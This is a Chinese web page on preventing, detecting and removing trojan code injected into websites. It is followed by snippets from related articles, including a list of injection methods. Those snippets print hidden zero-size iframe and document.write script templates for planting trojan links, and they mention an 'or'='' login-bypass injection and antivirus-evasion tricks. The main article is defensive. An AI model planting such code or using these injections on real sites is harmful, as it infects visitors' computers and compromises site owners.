如何预防和检测网页挂马?

在网站优化设计当中,检测网页木马也是很重要的一项工作,目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。本文主要介绍网页挂马的工作原理及种类、常见方式、执行方式、如何检测网页是否被挂马、如何清除网页木马。如何防止网页被挂马。


1:网页挂马工作原理的种类.

(1)工作原理:

    作为网页挂马的散布者,其目的是将木马下载到用户本地,并进一步执行,当木马获得执行之后,就意味着会有更多的木马被下载,进一步被执行,进入一个恶性的循环,从而使用户的电脑遭到攻击和控制。为达到目的首先要将木马下载到本地

(2)种类:

    目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。更详细的资料,请点击查看挂马代码大全。详见网页挂马方式和技巧大汇总

2:常见方式

(1)将木马伪装为页面元素。木马则会被浏览器自动下载到本地。

(2)利用脚本运行的漏洞下载木马

(3)利用脚本运行的漏洞释放隐含在网页脚本中的木马

(4)将木马伪装为缺失的组件,或和缺失的组件捆绑在一起(例如:flash播放插件)。这样既达到了下载的目的,下载的组件又会被浏览器自动执行。

(5)通过脚本运行调用某些com组件,利用其漏洞下载木马。

(6)在渲染页面内容的过程中利用格式溢出释放木马(例如:ani格式溢出漏洞)

(7)在渲染页面内容的过程中利用格式溢出下载木马(例如:flash9.0.115的播放漏洞)

3:执行方式

(1)利用页面元素渲染过程中的格式溢出执行shellcode进一步执行下载的木马

(2)利用脚本运行的漏洞执行木马

(3)伪装成缺失组件的安装包被浏览器自动执行

(4)通过脚本调用com组件利用其漏洞执行木马。

(5)利用页面元素渲染过程中的格式溢出直接执行木马。

(6)利用com组件与外部其他程序通讯,通过其他程序启动木马(例如:realplayer10.5存在的播放列表溢出漏洞)

在与网马斗争的过程中,为了躲避杀毒软件的检测,一些网马还具有了以下行为:

  --6.1 修改系统时间,使杀毒软件失效

  --6.2 摘除杀毒软件的HOOK挂钩,使杀毒软件检测失效

  --6.3 修改杀毒软件病毒库,使之检测不到恶意代码。

  --6.4 通过溢出漏洞不直接执行恶意代码,而是执行一段调用脚本,以躲避杀毒软件对父进程的检测。

4:如何检测网页是否被挂马。

(1):专业检测工具,D盾 web查杀  点此进入

(2):google检测,或者可以利用Google搜索你的网站、博客进行检测。如果有网站有木马则google会在搜索列表的下方提示该网站有不安全因素。

(3):杀毒软件检测,常用的杀毒软件也可以检测出来。

(4):人工检测,打开你的网站、博客,点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。

(5):使用McAfee SiteAdvisor安全浏览网页的插件。例:检测网站是否安全可点此查看。

5:如何清除网页木马。

一旦中了网页木马,就看那些文件是最近修改过的,主要查看这些新文件,(从FTP中可以查看文件最近修改时间。)然后进入源文件把相关的网页挂马种类的可疑代码删除。
如果你对你所使用的网站、博客程序不熟悉,建议删除所有文件(数据库、图片、文档、程序模板主题等文件夹可以保留)或者利用当初的备份网站文件进行全覆盖

6:如何防止网页被挂马。如果你的网站还没有被挂马,请从预防开始吧。

(1):对网友开放上传附件功能的网站一定要进行身份认证,并只允许信任的人使用上传程序。

(2):保证你所使用的程序及时的更新。

(3):不要在前台网页上加注后台管理程序登陆页面的链接。

(4):要时常备份数据库等重要文件,但不要把备份数据库放在程序默认的备份目录下。

(5):管理员的用户名和密码要有一定复杂性,不能过于简单。

(6):IIS中禁止写入和目录禁止执行的功能,二项功能组合,可以有效的防止ASP木马。

(7):可以在服务器、虚拟主机控制面板,设置执行权限选项中,直接将有上传权限的目录,取消ASP的运行权限。

(8):创建一个robots.txt上传到网站根目录。Robots能够有效的防范利用搜索引擎窃取信息的骇客。 点此查看robots.txt使用方法。

拓展阅读

 (1)挂马要指标而且治本。治标用上面的方法就可以,结合挂马清理工具,清理挂马,或者用备份程序覆盖;

 (2)只修改IIS以及网站不够,必须强化服务器安全设置,包括服务器上的软件的安全,特别是MySQL和SQLServer,磁盘权限设置,网站独立权限设置(防止跨站),安装木马   实时防御软件。这里,我给大家推荐 护卫神,他拥有一系列免费和收费软件和服务,包括主机管理系统,挂马清理软件,防入侵系统等。技术专业。

「网页挂马」又称为网页隐藏式恶意连结。简单来说,其攻击模式分成四个步骤:

1. 黑客攻击企业、政府或知名网站,仅植入一段恶意连结而不窜改网页外观;或设立恶意网站,透过各种宣传手法,吸引民众浏览。

2. 使用者浏览该网站,由于黑客并未窜改网页外观,因此不会产生警觉。

3. 使用者看不到这个连结,也无须点选恶意连结,只要浏览该网站,就会背景导向联机至黑客预先设计好的陷阱。

4. 在不知情的状况下,使用者被植入间谍软件/木马程序。

如何预防和检测网页挂马?

时间: 2024-08-15 03:07:49

如何预防和检测网页挂马?的相关文章

利用登陆文件注入漏洞给网页挂马

本文操作方法十分简单,按照操作提示一步步来就可以完成了.不少网站在后台登陆框输入‘or’'='代码就可以直接登陆网站后台,这种方式曾经是最流行入侵方式,而今天卢松松讲的是如何利用login后台登陆文件漏洞注入代码. login.php(.asp/.aspx)文件一般都是作为CMS系统的管理员后台登陆文件,这里以PHP168CMS系统为例,login.php漏洞实际上的一个注入漏洞,是利用文件代码设计不良直接讲恶意代码直接上传到网站目录中.利用此漏洞可以进入网站,实行内容篡.网页挂马等手段. 第一

用go实现web日志分析及网页挂马关键字检测

本程序主要实现网页挂马关键字检测,原理是这样的,通过定时分析用户访问的IIS web日志,对日志的里的URL进行访问,然后检索是否包含相关的关键字,有就入库,这只是go实现自动检索及入库,可以加个前端,实现加关键及报警功能 package main import (     "bufio"     "code.google.com/p/mahonia"     "fmt"     "io"     "io/iouti

网页挂马方式

一:框架挂马 <iframe src=地址 width=0 height=0></iframe> 二:js文件挂马 首先将以下代码 document.write("<iframe width='0' height='0' src='地址'></iframe>"); 保存为xxx.js, 则JS挂马代码为 <script language=javascript src=xxx.js></script> 三:js变形加

网页挂马大全集 -中国寒龙出品 转载写明出处www.hackerschina.org

一:框架挂马<iframe src=地址 width=0 height=0></iframe>二:js文件挂马首先将以下代码document.write("<iframe width='0' height='0' src='地址'></iframe>");保存为xxx.js,则JS挂马代码为<script language=javascript src=xxx.js></script>三:js变形加密<SCR

检测网站挂马程序(Python)

系统管理员通常从svn/git中检索代码,部署站点后通常首先会生成该站点所有文件的MD5值,如果上线后网站页面内容被篡改(如挂马)等,可以比对之前生成MD5值快速查找去那些文件被更改,为了使系统管理员第一时间发现,可结合crontab或nagios等工具. 程序测试如下: # python check_change.py Usage: python check_change.py update /home/wwwroot python check_change.py check /home/ww

揭秘几种最主要的挂马技术

网页挂马是攻击者惯用的入侵手段,其影响极其恶劣.不仅让站点管理者蒙羞,而且殃及池鱼使站点的浏览者遭殃.不管是站点维护者还是个人用户,掌握.了解一定的网页挂马及其防御技术是非常必要的. 1.关于网页挂马 网页挂马就是攻击者通过在正常的页面中(通常是网站的主页)插入一段代码.浏览者在打开该页面的时候,这段代码被执行,然后下载并运行某木马的服务器端程序,进而控制浏览者的主机. 2.获取Webshell 攻击者要进行网页挂马,必须要获取对站点文件的修改权限,而获取该站点Webshell是最普遍的做法.

网站图片挂马检测及PHP与python的图片文件恶意代码检测对比

前言 周一一早网管收到来自阿里云的一堆警告,发现我们维护的一个网站下有数十个被挂马的文件.网管直接关了vsftpd,然后把警告导出邮件给我们. 取出部分大致如下: 服务器IP/名称 木马文件路径 更新时间 木马类型 状态(全部) *.*.*.* /path/*144.gif 2017/8/7 5:53 Webshell 待处理 *.*.*.* /path/*132.jpg 2017/8/7 5:23 Webshell 待处理 *.*.*.* /path/*156.txt 2017/8/7 5:2

怎样进行网站被挂马检测?工具有哪些呢?

使用搜索引擎搜索"网站挂马检测"我们可以看到有许多的网站挂马检测工具及网站被挂马检测工具平台.我们来看看常用的网站被挂马检测工具及在线网站被挂马检测工具平台都有那些? 360网站安全检测平台(http://webscan.360.cn): 可以免费在线检测网站.网页木马.网站后门程序.网站漏洞等.网站在线被挂马检测,不需要网站验证,但如果想看到网站安全详情,就需要网站验证. 百度云观测(http://ce.baidu.com): 可以检测网站运行状况.网站安全性.网站访问速度.网站SE

网站被挂马后半天内恢复正常的秘密

这两天了解到很多朋友的网站被挂马了,搜索引擎输入网站名称或者域名,就会有安全联盟的提示:该页面可能已被非法篡改!后面还写着:风险!红色的字很显眼:这的确很让人着急啊,新辰是最清楚的,因为我的网站也被挂马了,经过了半天的奋战才解决了问题,接下来新辰为朋友们介绍一下我的解封方法. 一,进入服务器,迅速查杀木马,检查程序代码 既然安全联盟提示有风险,除了很少几率的被误判外,基本上都是被挂马了.所以,新辰认为,首先应该进行木马的查杀.不过可惜,新辰以前没有重视网站的安全性,所以服务器并没有安装杀毒软件,